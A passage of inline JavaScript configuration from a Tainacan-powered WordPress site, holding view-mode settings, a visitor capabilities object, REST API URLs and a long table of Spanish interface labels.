0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 74%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 86%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 98%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 85%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":true}},"enabled_view_modes":["mosaic-legacy","frame","exhibition","books","polaroid","document","albums","grid","table","cards","records","masonry","slideshow","list","map","mosaic","gallery"],"default_view_mode":"masonry","default_order":"DESC","default_orderby":"date","enable_item_link_query_params":"1"}; var tainacan_user = {"caps":{"manage_tainacan":false,"tnc_rep_edit_users":false,"tnc_rep_edit_collections":false,"tnc_rep_delete_collections":false,"tnc_rep_edit_taxonomies":false,"tnc_rep_edit_others_taxonomies":false,"tnc_rep_delete_taxonomies":false,"tnc_rep_delete_others_taxonomies":false,"tnc_rep_edit_metadata":false,"tnc_rep_edit_filters":false,"tnc_rep_delete_metadata":false,"tnc_rep_delete_filters":false,"tnc_rep_read_private_collections":false,"tnc_rep_read_private_taxonomies":false,"tnc_rep_read_private_metadata":false,"tnc_rep_read_private_filters":false,"tnc_rep_read_logs":false},"prefs":"","data":[],"nonce":"","ajax_nonce":"","tainacan_api_url":"https://capazmente.com/wp-json/tainacan/v2","wp_api_url":"https://capazmente.com/wp-json/wp/v2/","wp_ajax_url":"https://capazmente.com/wp-admin/admin-ajax.php"}; var tainacan_plugin = {"tainacan_api_url":"https://capazmente.com/wp-json/tainacan/v2","wp_api_url":"https://capazmente.com/wp-json/wp/v2/","wp_ajax_url":"https://capazmente.com/wp-admin/admin-ajax.php","classes":[],"i18n":{"is_equal_to":"Igual","is_not_equal_to":"No es igual","contains":"Contiene","not_contains":"No contiene","greater_than":"Mayor que","less_than":"Menor que","greater_than_or_equal_to":"Mayor que o igual a","less_than_or_equal_to":"Menor que o igual a","before":"Antes","after":"Despu\u00e9s","before_or_on_day":"Antes (incluyendo)","after_or_on_day":"Despu\u00e9s (incluyendo)","has_value":"Has value","has_no_value":"Has no value","repository":"Repositorio","collections":"Colecciones","items":"Elementos","metadata":"Metadatos","metadata_types":"Tipos de metadatos","filters":"Filtros","taxonomies":"Taxonom\u00edas","activities":"Actividades","collection":"Colecci\u00f3n","item":"Elemento","metadatum":"Metadato","filter":"Filtro","taxonomy":"Taxonom\u00eda","activity":"Actividad","term":"T\u00e9rmino","terms":"T\u00e9rminos","mapping":"Asignaci\u00f3n","importers":"Importadores","processes":"Procesos","sequence":"Secuencia","exporters":"Exportadores","capabilities":"Capacidades","close":"Cerrar","edit":"Editar","settings":"Ajustes","new":"Nuevo","add_value":"A\u00f1adir valor","import":"Importar","export":"Exportar","cancel":"Cancelar","remove_point":"Remove point","remove_value":"Eliminar valor","remove_a_value":"Eliminar valor","clear_values":"Vaciar valores","remove_filter":"Eliminar el filtro","save":"Guardar","next":"Siguiente","previous":"Anterior","back":"Volver","exit":"Salir","see":"Ver","search":"Buscar","advanced_search":"B\u00fasqueda avanzada","continue":"Continuar","approve_item":"Aprobar","not_approve_item":"No se ha aprobado","add_one_item":"A\u00f1adir un elemento","add_items_bulk":"A\u00f1adir elementos en lote","add_items_external_source":"A\u00f1adir elementos de una fuente externa","new_mapped_item":"Nueva colecci\u00f3n asignada","new_blank_collection":"Nueva colecci\u00f3n en blanco","split":"Dividir","unified":"Unificado","add_another_search_criterion":"A\u00f1adir otro criterio de b\u00fasqueda","add_one_search_criterion":"A\u00f1adir un criterio de b\u00fasqueda","remove_search_criterion":"Eliminar el criterio de b\u00fasqueda","clear_search":"Vaciar b\u00fasqueda","run":"Ejecutar","edit_search":"Editar b\u00fasqueda","apply":"Aplicar ","add_another_bulk_edit":"A\u00f1adir otro criterio de edici\u00f3n en lotes","add_one_bulk_edit":"A\u00f1adir un criterio de edici\u00f3n en lotes","remove_bulk_edit":"Eliminar criterio de edici\u00f3n en lotes","set_new_value":"Establecer el nuevo valor","replace_value":"Sustituir el valor","copy_value":"Copiar valor de","finish":"Finalizar","select_to_create":"seleccionar para crear","new_bulk_edit_criterion":"Nuevo criterio de edici\u00f3n en lotes","undo":"Deshacer","delete":"Borrar","skip":"Omitir","add":"A\u00f1adir","show":"Show","comments_status_open":"Abierto","comments_status_closed":"Cerrado","status_publish":"Publicar","status_publish_description":"Everyone can see it.","status_public":"P\u00fablico","status_draft":"Borrador","status_draft_description":"Not ready to be published.","status_pending":"Pending","status_pending_description":"Pending review before publishing.","status_private":"Privado","status_private_description":"Only you and those with permission can see it.","status_trash":"Papelera","status_trash_description":"Deleted, but not permanently.","status_auto-draft":"Borrador autom\u00e1tico","label_open_access":"Acceso abierto","label_restrict_access":"Restringir acceso","label_open_advanced_search":"Open advanced search","label_close_advanced_search":"Close advanced search","label_show_more_options":"Show more options","title_repository_collections_page":"Colecciones","title_items_page":"Todos los elementos de todas las colecciones","title_my_items_page":"My items","title_repository_metadata_page":"Metadatos del repositorio","title_repository_filters_page":"Filtros de repositorio","title_taxonomies_page":"Taxonom\u00edas","title_terms_page":"T\u00e9rminos","title_repository_activities_page":"Actividades del repositorio","title_repository_reports_page":"Repository Reports","title_reports":"Informes","title_collection_page":"Elementos de la colecci\u00f3n","title_my_items_collection_page":"My items from","title_item_page":"Elemento","title_metadatum_page":"Metadatos","title_collection_activities":"Actividades de la colecci\u00f3n","title_filter_page":"Filtro","title_taxonomy_page":"Taxonom\u00eda","title_term_edit":"Edici\u00f3n del t\u00e9rmino","title_term_creation":"Crear un nuevo t\u00e9rmino","title_activity_page":"Actividad","title_create_collection":"Creaci\u00f3n de colecci\u00f3n","title_create_taxonomy_page":"Creaci\u00f3n de taxonom\u00eda","title_create_item_collection":"Crear elemento en la colecci\u00f3n","title_create_filter":"Creaci\u00f3n de filtros","title_collection_settings":"Ajustes de colecci\u00f3n","title_edit_item":"Editar elemento","title_taxonomy_edit_page":"Editar taxonom\u00eda","title_filter_edit":"Editar filtro","title_metadatum_edit":"Editar metadato","title_collection_metadata_edit":"Editar metadatos de","title_collection_filters_edit":"Editar filtros de","title_collection_reports":"Reports of","title_importer_page":"Importador","title_importer_mapping_page":"Asignaci\u00f3n de metadatos","title_importers_page":"Importadores","title_export_collection_page":"P\u00e1gina de exportaci\u00f3n de la colecci\u00f3n","title_export_item_page":"Exportar el elemento","title_exporters_page":"Exportadores","title_processes_page":"Procesos","title_item_bulk_add":"A\u00f1adir elementos en lote","title_exporter_page":"Exportador","title_collection_capabilities":"Capacidades relacionadas con la colecci\u00f3n","title_repository_capabilities":"Capacidades relacionadas con el repositorio","title_slides-help-modal":"Bienvenido al modo de vista de diapositivas","label":"Etiqueta","label_clean":"Vaciar","label_none":"Ninguno","label_clear_filters":"Vaciar filtros","label_and":"y","label_selected":"Seleccionado","label_nothing_selected":"Nada seleccionado","label_relationship_new_search":"Nueva b\u00fasqueda","label_relationship_items_found":"Elementos encontrados","label_menu":"Men\u00fa","label_main_menu":"Men\u00fa principal","label_collection_menu":"Men\u00fa de la colecci\u00f3n","label_title":"T\u00edtulo","label_settings":"Ajustes","label_actions":"Acciones","label_name":"Nombre","label_description":"Descripci\u00f3n","label_status":"Estado","label_slug":"Slug","label_image":"Imagen","label_thumbnail":"Miniatura","label_thumbnail_alt":"Alternative text","label_empty_thumbnail":"Miniatura vac\u00eda","label_empty_term_image":"Imagen del t\u00e9rmino vac\u00eda","label_parent_collection":"Colecci\u00f3n padre","label_no_parent_collection":"No hay colecci\u00f3n padre","label_button_view":"Bot\u00f3n ver","label_button_edit":"Bot\u00f3n editar","label_button_delete":"Bot\u00f3n \u00abBorrar\u00bb","label_button_untrash":"Bot\u00f3n de eliminar de la papelera","label_button_delete_header_image":"Bot\u00f3n \u00abBorrar la imagen de la cabecera\u00bb","label_button_edit_thumb":"Bot\u00f3n de edici\u00f3n de miniaturas","label_button_edit_header_image":"Bot\u00f3n \u00abEditar la imagen de la cabecera\u00bb","label_button_edit_document":"Bot\u00f3n de editar documento","label_button_delete_document":"Bot\u00f3n de borrar el documento","label_choose_thumb":"Elegir miniatura","label_button_delete_thumb":"Bot\u00f3n borrar miniatura","label_collections_per_page":"Colecci\u00f3n por p\u00e1gina:","label_taxonomies_per_page":"Taxonom\u00edas por p\u00e1gina:","label_terms_per_page":"T\u00e9rminos por p\u00e1gina","label_activities_per_page":"Actividades por p\u00e1gina:","label_items_per_page":"Elementos por p\u00e1gina:","label_attachments_per_page":"Adjuntos por p\u00e1gina:","label_processes_per_page":"Procesos por p\u00e1gina:","label_go_to_page":"Ir a la p\u00e1gina:","label_active_metadata":"Metadatos activos","label_available_metadata":"Metadatos disponibles","label_available_metadata_types":"Tipos de metadatos disponibles","label_active_filters":"Filtros activos","label_filter_type":"Tipo de filtro","label_available_filters":"Filtros disponibles","label_available_filter_types":"Tipos de filtro disponibles","label_per_page":"Por p\u00e1gina","label_displayed_metadata":"Metadatos mostrados","label_required":"Obligatorio","label_allow_multiple":"Permitir valores m\u00faltiples ","label_default_value":"Valor por defecto","label_unique_value":"Unique value across items","label_yes":"S\u00ed","label_no":"No","label_approved":"Aprobado","label_collection_related":"Colecci\u00f3n relacionada","label_metadata_for_search":"Metadatos para la b\u00fasqueda","label_select_taxonomy":"Seleccionar la taxonom\u00eda","label_select_taxonomy_input_type":"Tipo de entrada","label_taxonomy_allow_new_terms":"Permitir nuevos t\u00e9rminos","label_selectbox_init":"Seleccionar","label_insert_options":"Insertion options","label_insert_items":"Insertar elementos","label_available_terms":"T\u00e9rminos disponibles","label_some_available_terms":"Algunos t\u00e9rminos disponibles","label_attachments":"Adjuntos","label_attachment":"Adjunto","label_enabled":"Activado","label_disabled":"Desactivado","label_creation":"Creaci\u00f3n","label_creation_date":"Fecha de creaci\u00f3n","label_modification_date":"Fecha de modificaci\u00f3n","label_collection_items":"Elementos de la colecci\u00f3n","label_collection_metadata":"Metadatos de la colecci\u00f3n","label_collection_filters":"Filtros de la colecci\u00f3n","label_parent_term":"T\u00e9rmino padre","label_children_terms":"t\u00e9rminos hijos","label_new_term":"New Term","label_create_new_term":"Crear un nuevo t\u00e9rmino","label_create_and_select":"Crear y seleccionar","label_new_child":"Nuevo hijo","label_taxonomy_terms":"T\u00e9rminos de taxonom\u00eda","label_no_parent_term":"No hay t\u00e9rmino padre","label_term_without_name":"T\u00e9rmino sin nombre","label_inherited":"Heredado","label_core_title":"T\u00edtulo principal","label_core_description":"Descripci\u00f3n principal","label_default_section":"Default Section","label_sorting":"Clasificaci\u00f3n","label_sort":"Ordenar","label_activity_date":"Fecha de la actividad","label_activity_title":"Actividad","label_header_image":"Imagen de cabecera","label_empty_header_image":"Imagen de cabecera vac\u00eda","label_enable_cover_page":"Activar la p\u00e1gina de portada","label_cover_page":"P\u00e1gina de portada","label_allow_comments":"Permitir comentarios","label_comments":"Comentarios","label_default_displayed_metadata":"Metadatos mostrados por defecto","label_display":"Mostrar en el cat\u00e1logo","label_display_default":"Mostrar por defecto","label_display_never":"Nunca mostrar","label_not_display":"No mostrar por defecto","label_no_terms_selected":"No hay t\u00e9rminos seleccionados","label_attach_to_item":"Adjuntar al elemento","label_document":"Documento","label_document_empty":"Documento vac\u00edo","label_document_content":"Document content","label_file":"Archivo","label_text":"Texto","label_url":"URL","label_select_file":"Seleccionar archivo","label_selected_file":"Archivo seleccionado","label_expand_all":"Expandir todo","label_collapse_all":"Contraer todo","label_expand":"Expand","label_collapse":"Collapse","label_view_term":"Ver t\u00e9rminos","label_all_items":"Todos los elementos","label_all_collections":"Todas las colecciones","label_authored_by_me":"Authored by me","label_show_only_created_by_me":"Show only created by me","label_collections_that_i_can_edit":"Collections that I can edit","label_all_taxonomies":"Todas las taxonom\u00edas","label_bulk_actions":"Acciones en lote","label_delete_selected_collections":"Borrar las colecciones seleccionadas","label_edit_selected_collections":"Editar las colecciones seleccionadas","label_delete_permanently":"Borrar definitivamente","label_send_to_trash":"Enviar a la papelera","label_keep_on_trash":"Mantener en la papelera","label_delete_selected_taxonomies":"Borrar las taxonom\u00edas seleccionadas","label_view_only_selected_items":"Ver solo los elementos seleccionados","label_bulk_edit_selected_items":"Edici\u00f3n en lotes de los elementos seleccionados","label_sequence_edit_selected_items":"Editar los elementos seleccionados en secuencia","label_edit_selected_taxonomies":"Editar las taxonom\u00edas seleccionadas","label_select_all_collections_page":"Seleccionar todas las colecciones en la p\u00e1gina","label_select_all_items_page":"Seleccionar todos elementos en la p\u00e1gina","label_select_all_taxonomies_page":"Seleccionar todas las taxonom\u00edas en la p\u00e1gina","label_select_all_processes_page":"Seleccionar todos los procesos en la p\u00e1gina","label_select_all_terms":"Select all taxonomy terms","label_all_terms_selected":"All terms selected","label_add_or_update":"Add or update","label_blank_collection":"Colecci\u00f3n en blanco","label_dublin_core":"Dublin Core","label_created_by":"Creado por","label_apply_changes":"Aplicar los cambios","label_view_mode":"Modo de visualizaci\u00f3n","label_default_view_mode":"Modo de visualizaci\u00f3n por defecto","label_enabled_view_modes":"Modos de visualizaci\u00f3n activados","label_view_modes_available":"View modes available","label_warning":"Advertencia","label_error":"Error","label_thumbnails":"Miniaturas","label_grid":"Miniaturas","label_table":"Tabla","label_cards":"Tarjetas","label_mosaic":"Mosaico","label_records":"Registros","label_masonry":"Mosaico","label_list":"Lista","label_visualization":"Visualizaci\u00f3n","label_view_on":"Ver en","label_available_importers":"Importadores disponibles","label_target_collection":"Colecci\u00f3n objetivo","label_source_file":"Archivo fuente","label_url_source_link":"Enlace de la URL de origen","label_metadata_mapping":"Asignaci\u00f3n de metadatos","label_select_metadatum":"Selecciona el metadato","label_create_metadatum":"Crear metadato","label_create_repository_metadata":"Crear metadatos del repositorio","label_select_metadatum_type":"Selecciona un tipo de metadato","label_add_more_metadata":"A\u00f1adir m\u00e1s metadatos","label_from_source_collection":"Desde el archivo de origen","label_to_target_collection":"Para la colecci\u00f3n destino","label_from_source_mapper":"Metadatos de esta colecci\u00f3n","label_to_target_mapper":"Se asignar\u00e1 a estos metadatos","label_add_value":"A\u00f1adir valor","label_remove_value":"Eliminar valor","label_create_new_page":"Crear una nueva p\u00e1gina","label_total_items":"Total de elementos","label_total_terms":"Total terms","label_view_all":"Ver todo","label_until":"hasta","label_visibility":"Visibilidad","label_discard":"Descartar","label_save_as_draft":"Guardar como borrador","label_update_draft":"Actualizar borrador","label_send_to_review":"Send to review","label_update_pending":"Update as pending","label_return_to_pending":"Return to pending","label_verb_publish":"Publicada","label_verb_publish_privately":"Publish privately","label_publish":"Publicada","label_update":"Actualizar","label_mapper_metadata":"Asignador de metadatos","label_add_more_mapper_metadata":"A\u00f1adir m\u00e1s asignadores de metadatos","label_exposer_urls":"URLs del expositor","label_exposer_mapper_values":"Solo valores, sin esquema de metadatos","label_exposer":"expositor","label_mapper":"asignador","label_no_details_of_process":"No hay detalles acerca de este proceso","label_queued_on":"En cola de espera:","label_last_processed_on":"Procesado por \u00faltima vez el:","label_progress":"Progreso","label_process_completed":"Proceso completado","label_process_completed_with_errors":"Proceso completado con errores","label_process_cancelled":"Proceso cancelado por el usuario","label_process_paused":"Proceso en pausa","label_process_waiting":"Proceso en espera","label_stop_process":"Parar el proceso","label_delete_process":"Borrar proceso","label_process_failed":"El proceso ha fallado","label_max_options_to_show":"N\u00famero m\u00e1ximo de opciones mostradas","label_unnamed_process":"Proceso sin nombre","loading_processes":"Cargando procesos","label_semantic_uri":"URI sem\u00e1ntica","label_view_collection_on_website":"Ver colecci\u00f3n en la web","label_view_collections_on_website":"View collections on website","label_view_items_on_website":"View items on website","label_view_taxonomies_on_website":"View taxonomies on website","label_view_more":"Ver m\u00e1s","label_log_file":"Archivo de registro","label_error_log_file":"Archivo de registro de errores","label_import_items":"Importar elementos","label_hide_filters":"Ocultar el panel de filtros","label_show_filters":"Mostrar el panel de filtros","label_select_all_items":"Seleccionar todos los elementos","label_select_all":"Seleccionar todo","label_select_item":"Seleccionar el elemento","label_untrash_selected_items":"Restaurar desde la papelera","label_value_not_provided":"No se ha proporcionado ning\u00fan valor.","label_description_not_provided":"No se ha proporcionado una descripci\u00f3n.","label_save_goto_metadata":"Guardar e ir a los metadatos","label_save_goto_filter":"Guardar e ir a los filtros","label_view_all_collections":"Ver todas las colecciones","label_view_on_theme":"Ver en el tema","label_view_items_on_theme":"Ver todos los elementos del tema","label_view_collections_on_theme":"Ver todas las colecciones en el tema","label_create_collection":"Crear colecci\u00f3n","label_hide_metadata":"Ocultar metadatos","label_show_metadata":"Mostrar metadatos","label_all_terms":"Todos los t\u00e9rminos","label_selected_terms":"T\u00e9rminos seleccionados","label_selected_term":"T\u00e9rmino seleccionado","label_%s_selected_items":"%s elementos seleccionados","label_selected_item":"Elemento seleccionado","label_selected_items":"Elementos seleccionados","label_one_selected_item":"Un elemento seleccionado","label_all_items_selected":"Todos los elementos seleccionados","label_%s_on_this_page":"%s en esta p\u00e1gina","label_all_metadatum_values":"Todos los valores de los metadatos","label_selected_metadatum_values":"Valores de metadatos seleccionados","label_editing_item_number":"Editando elemento n.","label_sequence_editing_item":"Editando en secuencia: Elemento","label_%s_files_remaining":"%s archivos restantes.","label_one_file_remaining":"Un archivo restante","label_upload_file_prepare_items":"Subiendo archivos y preparando elementos","label_bulk_edit_items":"Edici\u00f3n en lotes de elementos","label_sequence_edit_items":"Edici\u00f3n de elementos en secuencia","label_documents_upload":"Subida de documentos","label_added_items":"Elementos a\u00f1adidos","label_filters_from":"Filtros de","label_available_exporters":"Exportadores disponibles","label_source_collection":"Colecci\u00f3n de origen","label_send_email":"Env\u00edame un correo electr\u00f3nico cuando est\u00e9 hecho.","label_urls":"URLs","label_page":"P\u00e1gina","label_item_page":"P\u00e1gina del elemento","label_activity_description":"Descripci\u00f3n de la actividad","label_activity_creation_date":"Fecha de creaci\u00f3n de la actividad","label_activity_author":"Autor de la actividad","label_approbation":"Aprobaci\u00f3n","label_urls_for_items_list":"URLs para la lista de elementos","label_urls_for_item_page":"URLs para la p\u00e1gina del elemento","label_item_page_on_website":"P\u00e1gina del elemento en la web","label_items_list_on_website":"Lista de elementos en la web","label_taxonomy_page_on_website":"Taxonomy page on website","label_term_page_on_website":"Term page on website","label_copy_link_url":"Copiar la URL del enlace","label_open_externally":"Abrir externamente","label_no_output_info":"Sin informaciones de salida","label_output":"Salida","label_no_mapping":"Sin asignaci\u00f3n","label_descending":"Descendente","label_ascending":"Ascendente","label_slides":"Diapositivas","label_items_list":"Lista de elementos","label_items_list_results":"Items list results","label_list_pagination":"Paginaci\u00f3n de la lista","label_sort_visualization":"Control de clasificaci\u00f3n y visualizaci\u00f3n","label_tainacan_api":"API del Tainacan","label_filter_type_preview":"Vista previa del tipo de filtro","label_metadatum_type_preview":"Vista previa del tipo de metadato","label_open_item_new_tab":"Abrir el elemento en una nueva pesta\u00f1a","label_open_collection_new_tab":"Abrir la colecci\u00f3n en una nueva pesta\u00f1a","label_unselect_item":"Anular selecci\u00f3n del elemento","label_select_collection":"Selecciona la colecci\u00f3n","label_unselect_collection":"Anular selecci\u00f3n de la colecci\u00f3n","label_delete_item":"Borrar elemento","label_delete_collection":"Borrar la colecci\u00f3n","label_no_collections_using_taxonomy":"No hay ninguna colecci\u00f3n que utiliza esta taxonom\u00eda","label_collections_using":"Colecciones utilizando","label_select_all_%s_items":"Seleccionar todos %s elementos ","label_next_page":"P\u00e1gina siguiente","label_previous_page":"Pagina anterior","label_pagination":"Pagination","label_current_page":"P\u00e1gina actual","label_shrink_menu":"Reducir el men\u00fa","label_expand_menu":"Expandir men\u00fa","label_document_uploaded":"Documento subido","label_repository_filter":"Filter inherited from the repository","label_repository_metadatum":"Metadatum inherited from the repository","label_repository_metadata":"Repositorio de metadatos","label_collection_filter":"Filtro de la colecci\u00f3n","label_collection_metadatum":"Metadato de la colecci\u00f3n","label_collection_capabilities":"Capacidades de la colecci\u00f3n","label_recover_from_trash":"Recuperar de la papelera","label_show_children_terms":"Mostrar t\u00e9rminos hijos","label_begin_slide_transition":"Iniciar la transici\u00f3n de diapositivas","label_pause_slide_transition":"Pausar la transici\u00f3n de diapositivas","label_next_group_slides":"Siguiente grupo de diapositivas","label_previous_group_slides":"Grupo anterior de diapositivas","label_plugin_home_page":"P\u00e1gina de inicio del plugin","label_wordpress_admin_page":"P\u00e1gina de administrador del WordPress","label_view_all_%s_collections":"Ver todas las %s colecciones","label_view_collections_list":"Ver lista de colecciones","label_comparator":"Comparador","label_comparators":"Comparators","label_table_of_items":"Tabla de elementos","label_create_another_item":"Crear otro elemento","label_recent_collections":"Colecciones recientes","label_%s_items_copy_success":"\u00a1Se han creado %s copias del elemento correctamente!","label_one_item_copy_success":"\u00a1La copia del elemento se ha creado correctamente!","label_item_copy_failure":"Algo malo sucedi\u00f3... \u00a1La copia del elemento ha fallado!","label_preset_success":"The preset was applied with success!","label_create_another_taxonomy":"Crear otra taxonom\u00eda","label_make_copies_of_item":"Hacer copias del elemento","label_number_of_copies":"N\u00famero de copias","label_return_to_list":"Regresar a la lista","label_expose_only_displayed_metadata":"Exponer solo los metadatos visibles","label_allowed":"Permitido","label_not_allowed":"No permitido","label_view_as":"Ver como...","label_day":"D\u00eda","label_month":"Mes","label_year":"A\u00f1o","label_related_to":"Relacionado con","label_user_roles":"Perfiles de usuario","label_associated_roles":"Perfiles asociados","label_inherited_roles":"Perfiles heredados","label_editing_capability":"Capacidad de edici\u00f3n","label_default_author_user":"Establecer el autor del elemento como valor por defecto","label_create_new_item":"Crear un nuevo elemento","label_submit":"Enviar","label_know_more":"Saber m\u00e1s","label_request_details":"Solicitar detalles","label_root_terms":"T\u00e9rminos ra\u00edz","label_see_on_fullscreen":"Ver en pantalla completa las diapositivas","label_slides_help":"Ayuda con el modo de vista de diapositivas","label_space_key":"ESPACIO","label_esc_key":"ESC","label_view_selected_items_as":"Ver elementos seleccionados como...","label_actions_for_the_selection":"Acciones para la selecci\u00f3n","label_upload_custom_thumbnail":"Subir una miniatura personalizada","label_switch_document_type":"Cambiar tipo de documento","label_sending_form":"Enviando el formulario\u2026","label_form_not_loaded":"No se ha podido cargar este formulario","label_terms_not_used":"T\u00e9rminos no utilizados","label_terms_used":"T\u00e9rminos utilizados","label_number_of_terms":"N\u00famero de t\u00e9rminos","label_number_of_items":"N\u00famero de elementos","label_number_of_metadata":"N\u00famero de metadatos","label_usage_of_terms_per_taxonomy":"Uso de t\u00e9rminos por taxonom\u00eda","label_items_per_term":"Elementos por t\u00e9rminos","label_items_per_term_from_taxonomy":"Elementos por t\u00e9rmino de la taxonom\u00eda:","label_items_per_term_from_taxonomy_metadatum":"Elementos por t\u00e9rmino del metadato de taxonom\u00eda:","label_items_per_child_terms_of":"Elementos por t\u00e9rminos hijos de:","label_items_per_collection":"Elementos por colecci\u00f3n","label_loading_report":"Cargando informe...","label_fill_distribution":"Filling distribution","label_not_filled":"A\u00fan no se han llenado","label_filled":"Ya est\u00e1n llenos","label_not_used":"No se ha utilizado","label_select_a_taxonomy":"Selecciona una taxonom\u00eda","label_used":"Utilizado","label_select_a_taxonomy_metadatum":"Selecciona un metadato de taxonom\u00eda","label_items_with_this_metadatum_value":"Elementos con este valor de metadato","label_amount_of_items_per_metadatum_value":"Cantidad de elementos por valor de metadato","label_activities_during_year":"Actividades durante el a\u00f1o","label_compact_list":"Lista compactada","label_detailed_list":"Lista detallada","label_view_metadata_details":"Ver detalles de los metadatos","label_filter_by_metadata_type":"Filtrar por tipo de metadato","label_filter_by_type":"Filter by type","label_pie_chart":"Gr\u00e1fico circular","label_bar_chart":"Gr\u00e1fico de barras","label_anonymous_user":"Usuario an\u00f3nimo","label_select_a_year":"Seleccionar un a\u00f1o","label_all_users":"Todos los usuarios","label_activity_per_user":"Actividades por usuario","label_report_generated_on":"Informe generado en","label_get_latest_report":"Acceder el \u00faltimo informe","label_decrease":"Disminuir","label_increase":"Aumentar","label_set_all_create_metadata":"Establecer todos los metadatos que se van a crear","label_manage_collection":"Gestionar la colecci\u00f3n","label_chart_controls":"Controles de los gr\u00e1ficos","label_increase_zoom":"Aumentar el zoom","label_decrease_zoom":"Disminuir el zoom","label_zoom_by_selection":"Zoom por selecci\u00f3n","label_pan_selection":"Trasladar selecci\u00f3n","label_reset_zoom":"Restablecer el zoom","label_chart_export_options":"Export options","label_related_items":"Elementos relacionados con \u00e9ste","label_view_all_%s_related_items":"Ver los %s elementos relacionados","label_back_to_related_item":"Volver al elemento relacionado","label_options_of_the_%s_metadata_type":"Opciones del tipo de metadatos %s","label_advanced_metadata_options":"Opciones de metadatos avanzadas","label_maximum_of_%s_values":"m\u00e1ximo de %s valores","label_document_option_forced_iframe":"Mostrar el contenido en un iframe","label_amount_of_metadata_of_type":"Cantidad de metadatos de este tipo","label_document_option_iframe_height":"Altura del iframe (px)","label_document_option_iframe_width":"Ancho del iframe (px)","label_document_option_is_image":"Es un enlace a una imagen externa","label_limit_max_values":"Limita la cantidad de valores m\u00faltiples","label_items_selection":"Selecci\u00f3n de elementos","label_default_orderby":"Orden por defecto inicial","label_focus_mode":"Focus mode","label_start_focus_mode":"Start focus mode","label_close_search":"Close search","label_remove_all_criteria":"Remove all criteria","label_string_to_search_for":"String to search for","label_number_to_search_for":"Number to search for","label_date_to_search_for":"Date to search for","label_criterion_to_compare":"Criterion to compare","label_metadata_and_sections":"Metadata and Sections","label_metadata_%s_and_sections_%s":"Metadata (%1$s) and Sections (%2$s)","label_view_activity_logs":"View activity logs","label_item_activities":"Item activities","label_add_new_section":"Add new section","label_new_metadata_section":"New metadata section","label_show_details":"Show details","label_hide_details":"Hide details","label_move_up":"Move up","label_move_down":"Move down","label_view_modes_public_list":"Items view modes in the public list","label_default":"Por defecto","label_tainacan_mobile_panel":"Tainacan Mobile Panel","label_close_panel":"Close panel","label_shortcuts":"Shortcuts","label_all_metadata":"All metadata","label_document_and_thumbnail":"Document and thumbnail","label_all_attachments":"All attachments","label_only_required_metadata":"Only required metadata","label_update_as_public":"Update as public","label_update_as_private":"Update as private","label_change_to_private":"Change to private","label_change_to_draft":"Change to draft","label_create_item":"Create item","label_ready_to_create_item":"Ready to create this item?","label_only_required":"Only required","label_create_collection_from_mapper":"Create a new collection from a mapper","label_create_collection_from_preset":"Create a preset collection","label_preset_collections":"Preset collections","label_from_a_mapper":"From a metadata mapper","label_using_a_preset":"Using a preset","label_use_search_separated_words":"Search each word separatelly","label_map":"Map","label_show_item_location_on_map":"Show item location on map","label_showing_locations_for":"Showing locations for:","label_one_selected_location":"One location selected","label_%s_selected_locations":"%s locations selected","label_update_parent":"Change parent term","label_select_child_terms_long":"Select all child terms","label_select_child_terms_short":"All children","label_select_root_terms_long":"Select all root terms","label_select_root_terms_short":"All root terms","label_all_root_terms_selected":"All root terms selected","label_terms_child_of_%s_selected":"Terms child of %s selected","label_remove_selected_term":"Remove only the selected term","label_remove_term_and_descendants":"Remove term and its descendants","label_remove_selected_terms":"Remove only selected terms","label_remove_terms_and_descendants":"Remove terms and their descendants","label_%s_selected_terms":"%s terms selected","label_one_selected_term":"One term selected","label_no_parent_root_term":"No parent (set as root term)","label_used_by_items":"In use by some item","label_multiple_terms_insertion":"Multiple terms insertion","label_multiple_terms":"Multiple terms","label_multiple":"M\u00faltiple","label_separator":"Separator","label_loading_items":"Loading items...","label_items_list_options":"Items list options","label_item_edition_form_options":"Item edition form options","label_item_submission_options":"Item submission options","label_metadata_related_features":"Metadata related features","label_preview":"Preview","label_go_to_permalinks":"Go to permalinks","label_publication_data":"Publication data","label_authorship":"Authorship","label_editing_publication_authorship":"Publication authorship editing","label_range_of_dates":"Intervalo de fechas","label_view_processes":"View processes","label_collections_taxonomies":"Collection taxonomies","instruction_delete_selected_collections":"Borrar las colecciones seleccionadas","instruction_delete_selected_items":"Borrar los elementos seleccionados","instruction_delete_selected_taxonomies":"Borrar las taxonom\u00edas seleccionadas","instruction_image_upload_box":"Suelta una imagen aqu\u00ed o haz clic para subirla.","instruction_select_a_status":"Selecciona un estado:","instruction_select_a_status2":"Selecciona un estado","instruction_select_a_comments_status":"Selecciona un estado de los comentarios","instruction_click_to_select_a_filter_type":"Haz clic para seleccionar un tipo de filtro:","instruction_select_a_parent_term":"Selecciona un tipo de 